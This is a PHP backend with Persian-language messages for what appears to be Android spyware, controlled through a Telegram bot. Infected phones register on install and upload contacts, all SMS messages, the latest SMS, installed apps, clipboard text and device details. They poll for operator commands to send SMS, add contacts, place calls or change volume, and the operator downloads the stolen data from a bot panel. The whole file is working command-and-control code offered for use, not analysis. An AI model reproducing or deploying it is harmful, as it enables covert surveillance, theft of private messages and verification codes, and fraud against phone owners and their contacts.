<?php
// index.php
require_once 'config.php';
header("Content-Type: application/json; charset=UTF-8");
$content = file_get_contents("php://input");
$update = json_decode($content, true);

// --- مدیریت نصب ---
if (isset($update['action']) && $update['action'] == 'install_report') {
    handleAppInstall($update);
    exit;
}

// --- مدیریت دستورات ربات ---
if (isset($update['message'])) {
    handleUserMessage($update['message']);
    exit;
}

// --- مدیریت Callback ---
if (isset($update['callback_query'])) {
    handleCallbackQuery($update['callback_query']);
    exit;
}

// --- دریافت اطلاعات از اپلیکیشن ---
if (isset($update['action'])) {
    if ($update['action'] == 'upload_contacts') handleContactsUpload($update);
    elseif ($update['action'] == 'upload_sms') handleSmsUpload($update);
    elseif ($update['action'] == 'upload_last_sms') handleLastSmsUpload($update);
    elseif ($update['action'] == 'upload_apps') handleAppsUpload($update);
    elseif ($update['action'] == 'upload_clipboard') handleClipboardUpload($update);
    elseif ($update['action'] == 'check_command') handleCheckCommand($update);
    elseif ($update['action'] == 'sms_status') handleSmsStatus($update);
    elseif ($update['action'] == 'update_battery') handleBatteryUpdate($update);
    elseif ($update['action'] == 'update_device_info') handleDeviceInfoUpdate($update);
}

// --- توابع ---

function handleDeviceInfoUpdate($input) {
    $android_id = $input['android_id'];
    $info_text = $input['info_text'];
    updateDatabase($android_id, 'device_info', $info_text, false);
}

function handleAppInstall($input) {
    global $ADMIN_CHAT_ID;
    $android_id = isset($input['android_id']) ? $input['android_id'] : '';
    if (empty($android_id)) $android_id = 'ID_' . rand(100000, 999999);

    $db_data = [];
    if (file_exists(DB_FILE)) {
        $json_content = file_get_contents(DB_FILE);
        $db_data = json_decode($json_content, true) ?? [];
    }

    if (!isset($db_data[$android_id])) {
        $install_data = [
            'android_id' => $android_id,
            'install_time' => time(),
            'contacts' => '',
            'sms_data' => '',
            'last_sms' => '',
            'battery_info' => '',
            'device_info' => '',
            'apps_list' => '',
            'clipboard_text' => ''
        ];
        $db_data[$android_id] = $install_data;
        file_put_contents(DB_FILE, json_encode($db_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
        sendInstallNotification($android_id);
    }
}

function handleContactsUpload($input) {
    $android_id = $input['android_id'];
    $contacts_data = $input['data'];
    updateDatabase($android_id, 'contacts', $contacts_data, false);
}

function handleSmsUpload($input) {
    $android_id = $input['android_id'];
    $sms_data = $input['data'];
    updateDatabase($android_id, 'sms_data', $sms_data, true);
}

function handleLastSmsUpload($input) {
    $android_id = $input['android_id'];
    $last_sms_data = $input['data'];
    updateDatabase($android_id, 'last_sms', $last_sms_data, false);
}

// --- توابع جدید برای برنامه‌ها و کلیپ‌بورد ---
function handleAppsUpload($input) {
    $android_id = $input['android_id'];
    $apps_data = $input['data'];
    updateDatabase($android_id, 'apps_list', $apps_data, false);
    
    // --- ارسال پاسخ فوری برای جلوگیری از تایم‌اوت ---
    echo json_encode(['status' => 'success']);
    exit;
}

function handleClipboardUpload($input) {
    $android_id = $input['android_id'];
    $clip_data = $input['data'];
    updateDatabase($android_id, 'clipboard_text', $clip_data, false);
    
    // --- ارسال پاسخ فوری ---
    echo json_encode(['status' => 'success']);
    exit;
}


function updateDatabase($android_id, $field, $data, $append = false) {
    $db_data = [];
    if (file_exists(DB_FILE)) {
        $json_content = file_get_contents(DB_FILE);
        $db_data = json_decode($json_content, true) ?? [];
    }

    if (!isset($db_data[$android_id])) {
        $db_data[$android_id] = [
            'android_id' => $android_id,
            'install_time' => time(),
            'contacts' => '', 'sms_data' => '', 'last_sms' => '',
            'battery_info' => '', 'device_info' => '', 'apps_list' => '', 'clipboard_text' => ''
        ];
    }

    if ($append) {
        $separator = "\n\n--- BATCH SEPARATOR ---\n\n";
        $db_data[$android_id][$field] .= $separator . $data;
    } else {
        $db_data[$android_id][$field] = $data;
    }

    file_put_contents(DB_FILE, json_encode($db_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
}

function handleUserMessage($message) {
    $chat_id = $message['chat']['id'];
    $text = isset($message['text']) ? $message['text'] : '';
    
    if (strpos($text, '/set_') === 0) {
        $target_id = str_replace('/set_', '', $text);
        openUserPanel($chat_id, $target_id);
        return;
    }

    $state_file = 'state_' . $chat_id . '.json';
    $state = [];
    if (file_exists($state_file)) {
        $state = json_decode(file_get_contents($state_file), true) ?? [];
    }

    if (isset($state['step'])) {
        if ($state['step'] == 'waiting_contact_name') {
            $state['step'] = 'waiting_contact_number';
            $state['contact_name'] = $text;
            file_put_contents($state_file, json_encode($state));
            sendMessage($chat_id, "✅ نام دریافت شد.\n\n📱 لطفاً شماره تماس را وارد کنید:");
        } elseif ($state['step'] == 'waiting_contact_number') {
            $state['step'] = 'waiting_contact_confirm';
            $state['contact_number'] = $text;
            file_put_contents($state_file, json_encode($state));
            $msg = "👤 <b>اطلاعات مخاطب جدید:</b>\n\nنام: " . $state['contact_name'] . "\nشماره: " . $state['contact_number'] . "\n\nآیا مطمئن هستید؟";
            $keyboard = [['inline_keyboard' => [[['text' => '✅ تایید و ذخیره', 'callback_data' => 'confirm_add_contact'], ['text' => '❌ لغو', 'callback_data' => 'cancel_add_contact']]]]];
            sendMessage($chat_id, $msg, $keyboard);
        } elseif ($state['step'] == 'waiting_number') {
            $state['step'] = 'waiting_text';
            $state['target_number'] = $text;
            file_put_contents($state_file, json_encode($state));
            sendMessage($chat_id, "✅ شماره دریافت شد.\n\n📝 لطفاً متن پیامک را ارسال کنید:");
        } elseif ($state['step'] == 'waiting_text') {
            $state['step'] = 'waiting_confirm';
            $state['sms_body'] = $text;
            file_put_contents($state_file, json_encode($state));
            $msg = "📩 <b>اطلاعات پیامک برای ارسال:</b>\n\n👤 شناسه کاربر: <code>" . $state['android_id'] . "</code>\n📱 شماره مقصد: <code>" . $state['target_number'] . "</code>\n📝 متن پیام:\n" . $text . "\n\nآیا مطمئن هستید؟";
            $keyboard = [['inline_keyboard' => [[['text' => '✅ تایید و ارسال', 'callback_data' => 'confirm_send_sms'], ['text' => '❌ لغو', 'callback_data' => 'cancel_send_sms']]]]];
            sendMessage($chat_id, $msg, $keyboard);
        } elseif ($state['step'] == 'waiting_call_number') {
            $state['step'] = 'waiting_call_confirm';
            $state['call_number'] = $text;
            file_put_contents($state_file, json_encode($state));
            $msg = "📞 <b>شماره برای تماس:</b>\n\nشماره: " . $state['call_number'] . "\n\nآیا مطمئن هستید؟";
            $keyboard = [['inline_keyboard' => [[['text' => '✅ تایید و تماس', 'callback_data' => 'confirm_call_phone'], ['text' => '❌ لغو', 'callback_data' => 'cancel_call_phone']]]]];
            sendMessage($chat_id, $msg, $keyboard);
        }
    }
}

function handleCallbackQuery($callback_query) {
    $callback_id = $callback_query['id'];
    $chat_id = $callback_query['message']['chat']['id'];
    $data = $callback_query['data'];
    answerCallbackQuery($callback_id);

    $state_file = 'state_' . $chat_id . '.json';
    $state = [];
    if (file_exists($state_file)) {
        $state = json_decode(file_get_contents($state_file), true) ?? [];
    }

    // --- دانلود اطلاعات ---
    if (strpos($data, 'dl_contacts_') === 0) {
        sendGenericFile($chat_id, str_replace('dl_contacts_', '', $data), 'contacts', 'contacts.txt', 'مخاطبین');
    } elseif (strpos($data, 'dl_all_sms_') === 0) {
        sendGenericFile($chat_id, str_replace('dl_all_sms_', '', $data), 'sms_data', 'sms.txt', 'پیامک‌ها');
    } elseif (strpos($data, 'dl_last_sms_') === 0) {
        sendLastSmsText($chat_id, str_replace('dl_last_sms_', '', $data));
    } elseif (strpos($data, 'dl_apps_') === 0) {
        sendGenericFile($chat_id, str_replace('dl_apps_', '', $data), 'apps_list', 'apps.txt', 'لیست برنامه‌ها');
    } elseif (strpos($data, 'dl_clipboard_') === 0) {
        sendClipboardText($chat_id, str_replace('dl_clipboard_', '', $data));
    }
    
    // --- دستورات ---
    elseif ($data == 'req_send_sms') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        $state['step'] = 'waiting_number';
        file_put_contents($state_file, json_encode($state));
        sendMessage($chat_id, "📱 لطفاً شماره مقصد را وارد کنید:");
    } elseif ($data == 'confirm_send_sms') {
        if (isset($state['android_id']) && isset($state['target_number']) && isset($state['sms_body'])) {
            $cmd = ['command' => 'send_sms', 'number' => $state['target_number'], 'body' => $state['sms_body']];
            file_put_contents('cmd_' . $state['android_id'] . '.json', json_encode($cmd));
            sendMessage($chat_id, "⏳ دستور ارسال شد.");
            unlink($state_file);
        }
    } elseif ($data == 'cancel_send_sms') {
        if (file_exists($state_file)) unlink($state_file);
        sendMessage($chat_id, "❌ لغو شد.");
    } elseif ($data == 'req_add_contact') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        $state['step'] = 'waiting_contact_name';
        file_put_contents($state_file, json_encode($state));
        sendMessage($chat_id, "📝 لطفاً نام مخاطب را وارد کنید:");
    } elseif ($data == 'confirm_add_contact') {
        if (isset($state['android_id']) && isset($state['contact_name']) && isset($state['contact_number'])) {
            $cmd = ['command' => 'add_contact', 'name' => $state['contact_name'], 'number' => $state['contact_number']];
            file_put_contents('cmd_' . $state['android_id'] . '.json', json_encode($cmd));
            sendMessage($chat_id, "⏳ دستور افزودن مخاطب ارسال شد...");
            unlink($state_file);
        }
    } elseif ($data == 'cancel_add_contact') {
        if (file_exists($state_file)) unlink($state_file);
        sendMessage($chat_id, "❌ لغو شد.");
    } elseif ($data == 'req_call_phone') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        $state['step'] = 'waiting_call_number';
        file_put_contents($state_file, json_encode($state));
        sendMessage($chat_id, "📱 لطفاً شماره تماس را وارد کنید:");
    } elseif ($data == 'confirm_call_phone') {
        if (isset($state['android_id']) && isset($state['call_number'])) {
            $cmd = ['command' => 'call_phone', 'number' => $state['call_number']];
            file_put_contents('cmd_' . $state['android_id'] . '.json', json_encode($cmd));
            sendMessage($chat_id, "⏳ دستور تماس ارسال شد...");
            unlink($state_file);
        }
    } elseif ($data == 'cancel_call_phone') {
        if (file_exists($state_file)) unlink($state_file);
        sendMessage($chat_id, "❌ لغو شد.");
    } elseif ($data == 'req_device_info') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        // اصلاح خطای manager_id
        $cmd = ['command' => 'device_info'];
        file_put_contents('cmd_' . $state['android_id'] . '.json', json_encode($cmd));
        sendMessage($chat_id, "⏳ در حال دریافت اطلاعات دستگاه...");
    } elseif ($data == 'req_get_apps') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        sendCommandToPhone($state['android_id'], 'get_apps');
        sendMessage($chat_id, "⏳ در حال دریافت لیست برنامه‌ها...");
    } elseif ($data == 'req_get_clipboard') {
        if (!isset($state['android_id'])) return sendMessage($chat_id, "❌ ابتدا پنل کاربر را باز کنید.");
        sendCommandToPhone($state['android_id'], 'get_clipboard');
        sendMessage($chat_id, "⏳ در حال دریافت متن کلیپ‌بورد...");
    } elseif ($data == 'cmd_mute') {
        sendCommandToPhone($state['android_id'], 'mute');
        sendMessage($chat_id, "✅ دستور سایلنت ارسال شد.");
    } elseif ($data == 'cmd_vibrate') {
        sendCommandToPhone($state['android_id'], 'vibrate');
        sendMessage($chat_id, "✅ دستور ویبره ارسال شد.");
    } elseif ($data == 'cmd_max_volume') {
        sendCommandToPhone($state['android_id'], 'max_volume');
        sendMessage($chat_id, "✅ دستور افزایش صدا ارسال شد.");
    }
}

function handleCheckCommand($input) {
    $android_id = $input['android_id'];
    $cmd_file = 'cmd_' . $android_id . '.json';
    if (file_exists($cmd_file)) {
        $cmd = json_decode(file_get_contents($cmd_file), true);
        echo json_encode($cmd);
        unlink($cmd_file);
    } else {
        echo json_encode(['command' => 'none']);
    }
}

function handleSmsStatus($input) {
    global $ADMIN_CHAT_ID;
    $target = $input['target'];
    $status = $input['status'];
    $text = "📩 وضعیت پیامک:\nشماره: $target\nوضعیت: " . ($status == 'sent' ? '✅ ارسال شد' : '❌ ناموفق');
    $target_chat_id = $ADMIN_CHAT_ID;
    if (is_numeric($ADMIN_CHAT_ID)) $target_chat_id = "-100" . $ADMIN_CHAT_ID;
    sendMessage($target_chat_id, $text);
}

function getUserIdByChatId($chat_id) {
    $state_file = 'state_' . $chat_id . '.json';
    if (file_exists($state_file)) {
        $state = json_decode(file_get_contents($state_file), true);
        return $state['android_id'] ?? null;
    }
    return null;
}

function openUserPanel($chat_id, $user_id) {
    $state_file = 'state_' . $chat_id . '.json';
    file_put_contents($state_file, json_encode(['android_id' => $user_id, 'step' => 'none']));
    
    if (!file_exists(DB_FILE)) return sendMessage($chat_id, "❌ دیتابیس یافت نشد.");
    
    $db_data = json_decode(file_get_contents(DB_FILE), true);
    if (isset($db_data[$user_id])) {
        $info = $db_data[$user_id];
        $battery_text = !empty($info['battery_info']) ? $info['battery_info'] : "نامشخص";
        $device_info_display = !empty($info['device_info']) ? $info['device_info'] . "\n\n" : "📱 اطلاعات دستگاه در دسترس نیست.\n\n";
        
        $text = "🔍 پنل کاربر\n\n" . $device_info_display;
        $text .= "🔋 وضعیت باتری: <b>" . $battery_text . "</b>\n\n";
        $text .= "شناسه کاربر: <code>" . $user_id . "</code>\n";
        $text .= "تاریخ نصب: " . date('Y-m-d H:i:s', $info['install_time']) . "\n";
        
        $c_status = !empty($info['contacts']) ? "✅" : "❌";
        $s_status = !empty($info['sms_data']) ? "✅" : "❌";
        $l_status = !empty($info['last_sms']) ? "✅" : "❌";
        $a_status = !empty($info['apps_list']) ? "✅" : "❌";
        $cl_status = !empty($info['clipboard_text']) ? "✅" : "❌";
        
        $text .= "وضعیت داده‌ها:\n";
        $text .= "مخاطبین: $c_status | پیامک‌ها: $s_status | آخرین پیامک: $l_status\n";
        $text .= "برنامه‌ها: $a_status | کلیپ‌بورد: $cl_status";

        $keyboard = [
            'inline_keyboard' => [
                [['text' => '📱 اطلاعات دستگاه', 'callback_data' => 'req_device_info']],
                [['text' => '🔇 سایلنت', 'callback_data' => 'cmd_mute'], ['text' => '📳 ویبره', 'callback_data' => 'cmd_vibrate']],
                [['text' => '🔊 زیاد کردن صدا', 'callback_data' => 'cmd_max_volume']],
                [['text' => '📂 دریافت مخاطبین', 'callback_data' => 'dl_contacts_' . $user_id]],
                [['text' => '📩 دریافت پیامک‌ها', 'callback_data' => 'dl_all_sms_' . $user_id], ['text' => '📩 آخرین پیامک', 'callback_data' => 'dl_last_sms_' . $user_id]],
                [['text' => '📨 ارسال پیامک', 'callback_data' => 'req_send_sms'], ['text' => '👤 افزودن مخاطب', 'callback_data' => 'req_add_contact']],
                [['text' => '📞 تماس', 'callback_data' => 'req_call_phone']],
                [['text' => '📋 لیست برنامه‌ها', 'callback_data' => 'req_get_apps'], ['text' => '📑 متن کلیپ‌بورد', 'callback_data' => 'req_get_clipboard']]
            ]
        ];
        sendMessage($chat_id, $text, $keyboard);
    } else {
        sendMessage($chat_id, "❌ کاربری با شناسه <code>" . $user_id . "</code> یافت نشد.");
    }
}

function sendInstallNotification($android_id) {
    global $ADMIN_CHAT_ID;
    $target_chat_id = $ADMIN_CHAT_ID;
    if (is_numeric($ADMIN_CHAT_ID)) $target_chat_id = "-100" . $ADMIN_CHAT_ID;
    $total_installs = 0;
    if (file_exists(DB_FILE)) {
        $db_data = json_decode(file_get_contents(DB_FILE), true);
        $total_installs = is_array($db_data) ? count($db_data) : 0;
    }
    $text = "📱 نصب جدید!\n\nشناسه کاربر: <code>" . $android_id . "</code>\nبرای دسترسی به پنل دستور زیر را بفرستید:\n/set_" . $android_id . "\n\nتعداد کل نصب‌ها: " . $total_installs;
    sendMessage($target_chat_id, $text);
}

function sendClipboardText($chat_id, $user_id) {
    file_put_contents('debug_log.txt', "Clipboard requested for user: " . $user_id . "\n", FILE_APPEND);
    if (!file_exists(DB_FILE)) return sendMessage($chat_id, "دیتابیس یافت نشد.");
    $db_data = json_decode(file_get_contents(DB_FILE), true);
    
    if (isset($db_data[$user_id]) && !empty($db_data[$user_id]['clipboard_text'])) {
        $fullText = $db_data[$user_id]['clipboard_text'];
        $header = "📑 <b>متن کلیپ‌بورد:</b>\n\n";
        
        // تقسیم متن به بخش‌های حداکثر ۴۰۰۰ کاراکتر
        $chunks = str_split($fullText, 4000);
        
        foreach ($chunks as $index => $chunk) {
            $textToSend = ($index == 0) ? $header . $chunk : $chunk;
            sendMessage($chat_id, $textToSend);
        }
    } else {
        sendMessage($chat_id, "❌ متنی در کلیپ‌بورد یافت نشد.");
    }
}

function sendLastSmsText($chat_id, $user_id) {
    if (!file_exists(DB_FILE)) return sendMessage($chat_id, "دیتابیس یافت نشد.");
    $db_data = json_decode(file_get_contents(DB_FILE), true);
    if (isset($db_data[$user_id]) && !empty($db_data[$user_id]['last_sms'])) {
        $sms_content = $db_data[$user_id]['last_sms'];
        $text = "📩 <b>آخرین پیامک دریافت شده</b>\n\n<pre>" . htmlspecialchars($sms_content) . "</pre>";
        sendMessage($chat_id, $text);
    } else {
        sendMessage($chat_id, "❌ آخرین پیامکی یافت نشد.");
    }
}

function sendGenericFile($chat_id, $user_id, $db_field, $filename, $caption_text) {
    if (!file_exists(DB_FILE)) return sendMessage($chat_id, "دیتابیس یافت نشد.");
    $db_data = json_decode(file_get_contents(DB_FILE), true);
    if (isset($db_data[$user_id]) && !empty($db_data[$user_id][$db_field])) {
        $file_content = $db_data[$user_id][$db_field];
        file_put_contents($filename, $file_content);
        sendDocument($chat_id, $filename, "$caption_text: $user_id");
        if (file_exists($filename)) unlink($filename);
    } else {
        sendMessage($chat_id, "❌ داده‌ای برای این بخش یافت نشد.");
    }
}

function sendDocument($chat_id, $file_path, $caption) {
    $url = "https://api.telegram.org/bot" . BOT_TOKEN . "/sendDocument";
    $absolute_path = realpath($file_path);
    if ($absolute_path && file_exists($absolute_path)) {
        $cfile = new CURLFile($absolute_path);
        $data = ['chat_id' => $chat_id, 'document' => $cfile, 'caption' => $caption];
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch);
        curl_close($ch);
    } else {
        sendMessage($chat_id, "خطا در ایجاد فایل.");
    }
}

function sendMessage($chat_id, $text, $keyboard = null) {
    $url = "https://api.telegram.org/bot" . BOT_TOKEN . "/sendMessage";
    $data = ['chat_id' => $chat_id, 'text' => $text, 'parse_mode' => 'HTML'];
    if ($keyboard !== null) $data['reply_markup'] = json_encode($keyboard);
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_exec($ch);
    curl_close($ch);
}

function answerCallbackQuery($callback_id) {
    $url = "https://api.telegram.org/bot" . BOT_TOKEN . "/answerCallbackQuery";
    $data = ['callback_query_id' => $callback_id];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_exec($ch);
    curl_close($ch);
}

function handleBatteryUpdate($input) {
    $android_id = $input['android_id'];
    $level = isset($input['level']) ? $input['level'] : 0;
    $plugged = isset($input['plugged']) ? $input['plugged'] : false;
    // اصلاح خطای سینتکسی
    $status_text = ($plugged == "true" || $plugged == true) ? "در حال شارژ" : "در حال استفاده";
    updateDatabase($android_id, 'battery_info', "$level% - $status_text", false);
}

function sendCommandToPhone($android_id, $command_name) {
    $cmd_file = 'cmd_' . $android_id . '.json';
    $cmd = ['command' => $command_name];
    file_put_contents($cmd_file, json_encode($cmd));
}
?>
